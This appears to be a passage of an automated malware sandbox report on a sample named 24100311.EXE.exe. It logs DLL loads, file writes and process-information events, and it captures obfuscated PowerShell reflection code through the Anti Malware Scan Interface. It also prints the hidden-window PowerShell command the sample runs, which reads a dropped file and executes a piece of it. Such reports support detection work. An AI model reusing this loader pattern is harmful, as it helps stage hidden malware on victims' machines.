              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: Glued.lnk.0.drLNK file: ..\..\Users\user\Videos\homeopathic\blodfattigheden.afs
              Source: C:\Users\user\Desktop\24100311.EXE.exeFile written: C:\Users\user\AppData\Local\Temp\Cloud Setting.iniJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: 24100311.EXE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2044142173.000000000724B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: e.pdb1 source: powershell.exe, 00000001.00000002.2047324172.00000000081C0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdbg#1sO' source: powershell.exe, 00000001.00000002.2047324172.00000000081C0000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: Yara matchFile source: 00000001.00000002.2049174087.000000000A206000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Courgettens $Okkuperingens $Styket), (tailored @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Douras = [AppDomain]::CurrentDomain.GetAssemblies()$global:S
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Morfinrusen)), $Reflektorernes).DefineDynamicModule($Styrkende, $false).DefineType($vejovis, $Mundenes, [System.MulticastDelegate])$Br
              Source: C:\Users\user\Desktop\24100311.EXE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Forglemmelser=Get-Content -Raw 'C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Unengrossing\Independable.Ovi';$Fellifluous=$Forglemmelser.SubString(7655,3);.$Fellifluous($Forglemmelser)"
              Source: C:\Users\user\Desktop\24100311.EXE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Forglemmelser=Get-Content -Raw 'C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Unengrossing\Independable.Ovi';$Fellifluous=$Forglemmelser.SubString(7655,3);.$Fellifluous($Forglemmelser)"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_072CC35C push eax; ret 1_2_072CC35D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08D50E40 push eax; ret 1_2_08D51351

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\24100311.EXE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
